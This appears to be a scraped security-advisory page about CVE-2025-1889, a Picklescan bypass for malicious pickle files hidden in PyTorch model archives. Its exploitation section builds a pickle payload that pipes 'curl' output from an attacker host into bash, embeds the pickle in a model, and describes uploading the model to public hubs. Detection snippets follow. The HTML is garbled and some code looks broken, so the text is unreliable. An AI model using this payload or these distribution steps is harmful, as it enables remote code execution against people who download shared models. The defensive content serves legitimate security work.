PyTorch, Arbitrary Code Execution, CVE-2025-1889 (Critical)

How the CVE Works:

CVE-2025-1889 exploits a vulnerability in Picklescan, a tool designed to detect malicious pickle files in PyTorch model archives. Picklescan relies on file extensions (e.g., .pkl, .pt) to identify pickle files. However, PyTorch’s `torch.load()` function allows loading a secondary pickle file specified via the `pickle_file` parameter, bypassing Picklescan’s detection. Attackers can embed a malicious pickle file with a non-standard extension (e.g., config.p) inside a model archive. When the model is loaded, the malicious file is executed, leading to arbitrary code execution. This vulnerability is particularly dangerous in supply chain attacks, as PyTorch models are widely shared in repositories like Hugging Face and PyTorch Hub.

DailyCVE Form:

Platform: PyTorch

Version: All versions

Vulnerability: Arbitrary Code Execution

Severity: Critical

Date: 2025-01-01

What Undercode Say:

Exploitation:

  1. Craft Malicious Pickle File: Create a pickle file (config.p) with a payload for remote code execution.
    import os
    import pickle</li>
    </ol>
    
    class RemoteCodeExecution:
    def <strong>reduce</strong>(self):
    return os.system, ("curl -s http://attacker.com/malware.sh | bash",)
    
    with open("config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)
    
    1. Embed in Model Archive: Modify a PyTorch model to load the malicious file.
      import torch
      import zipfile</li>
      </ol>
      
      model = {}
      model['config'] = torch.load("model.pt", pickle_file='config.p')
      torch.save(model, "malicious_model.pt")
      
      with zipfile.ZipFile("malicious_model.pt", "a") as archive:
      archive.write("config.p", "config.p")
      
      1. Distribute Malicious Model: Upload the model to repositories like Hugging Face or PyTorch Hub.

      Protection:

      1. Scan All Files: Modify Picklescan to analyze all files in a ZIP archive, not just those with standard extensions.
        picklescan --full-scan malicious_model.pt
        

      2. Detect Hidden Pickle References: Use static analysis to identify `torch.load(pickle_file=…)` calls.

        import ast</p></li>
        </ol>
        
        <p>def detect_pickle_file_usage(code):
        tree = ast.parse(code)
        for node in ast.walk(tree):
        if isinstance(node, ast.Call) and hasattr(node.func, 'attr') and node.func.attr == 'load':
        for keyword in node.keywords:
        if keyword.arg == 'pickle_file':
        return True
        return False
        
        1. Magic Byte Detection: Check file contents for pickle magic bytes (\x80\x05).
          def is_pickle_file(file_path):
          with open(file_path, "rb") as f:
          return f.read(2) == b'\x80\x05'
          

        2. Block Dangerous Globals: Restrict the use of `torch.load` and `functools.partial` in untrusted code.

          import builtins</p></li>
          </ol>
          
          <p>original_import = builtins.<strong>import</strong>
          
          def safe_import(name, args, kwargs):
          if name in ['torch', 'functools']:
          raise ImportError(f"Import of {name} is restricted.")
          return original_import(name, args, kwargs)
          
          builtins.<strong>import</strong> = safe_import
          

          References:

          References:

          Reported By: https://github.com/advisories/GHSA-769v-p64c-89pr
          Extra Source Hub:
          Undercode

          Image Source:

          Undercode AI DI v2Featured Image

Scroll to Top